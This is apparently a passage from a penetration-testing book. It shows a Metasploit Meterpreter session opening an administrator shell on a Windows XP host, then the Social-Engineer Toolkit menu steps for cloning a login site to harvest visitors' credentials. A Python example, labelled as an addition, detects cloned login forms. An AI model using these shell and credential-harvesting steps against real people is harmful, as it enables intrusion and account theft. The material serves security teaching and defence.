Chapter 10

msf exploit(handler) > 
[*] Sending stage (748032 bytes) to 10.10.1.102
[*] Meterpreter session 1 opened (10.10.1.112:443 -> 10.10.1.102:58412)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell

Process 2819 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>

Username and Password Harvesting

In the preceding examples, the goal was to obtain access to the individual system. Relatively new within SET is the ability to clone a website and harvest visitors’ credentials when they access the site, as we’ll demonstrate using Gmail in this next example. SET can create a clone of the Gmail website and then automatically rewrite the POST parameters of that website to post to the SET web server and then redirect the user to the legitimately cloned website.
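From the defender's side, the rewritten form target described above is the detectable trait of a cloned login page. The following is an added example, not code from the book or from SET: it parses a page and flags any password form whose POST target resolves to a host outside an allowlist or to plain HTTP. The host names, the 192.0.2.10 address, and the HTML samples are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

class FormCollector(HTMLParser):
    """Record each form's action and whether it holds a password input."""
    def __init__(self):
        super().__init__()
        self.forms, self._open = [], None
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._open = {"action": a.get("action") or "", "password": False}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            if (a.get("type") or "").lower() == "password":
                self._open["password"] = True
    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None

def audit_login_forms(html, page_url, trusted_hosts):
    """Flag password forms whose POST target is off the trusted hosts or not HTTPS."""
    collector = FormCollector()
    collector.feed(html)
    findings = []
    for form in collector.forms:
        if not form["password"]:
            continue  # search boxes and similar forms carry no credentials
        # An empty or relative action resolves against the page that served it.
        target = urlsplit(urljoin(page_url, form["action"]))
        reasons = []
        if (target.hostname or "").lower() not in trusted_hosts:
            reasons.append("untrusted-host")
        if target.scheme != "https":
            reasons.append("not-https")
        if reasons:
            findings.append((target.geturl(), reasons))
    return findings

# Constructed samples: a genuine login page and a copy with a rewritten action.
TRUSTED = {"accounts.example.com"}
GENUINE = '<form action="/login" method="post"><input type="password" name="p"></form>'
CLONED = ('<form action="/search"><input type="text" name="q"></form>'
          '<form action="http://192.0.2.10/" method="post">'
          '<input type="text" name="u"/><input type="password" name="p"/></form>')

if __name__ == "__main__":
    print(audit_login_forms(GENUINE, "https://accounts.example.com/", TRUSTED))
    print(audit_login_forms(CLONED, "http://192.0.2.10/", TRUSTED))
```

A mail gateway or web proxy can run a check like this over pages reached from links in inbound messages, using the organization's real sign-in hosts as the allowlist.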

 3. Credential Harvester Attack Method

Enter your choice (press enter for default): 3

[!] Website Attack Vectors [!]

 2. Site Cloner

Enter number (1-4): 2

Email harvester will allow you to utilize the clone capabilities within SET
to harvest credentials or parameters from a website as well as place them into 
a report.

SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com

 Enter the url to clone: http://www.secmaniac.com

Press {return} to continue.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below: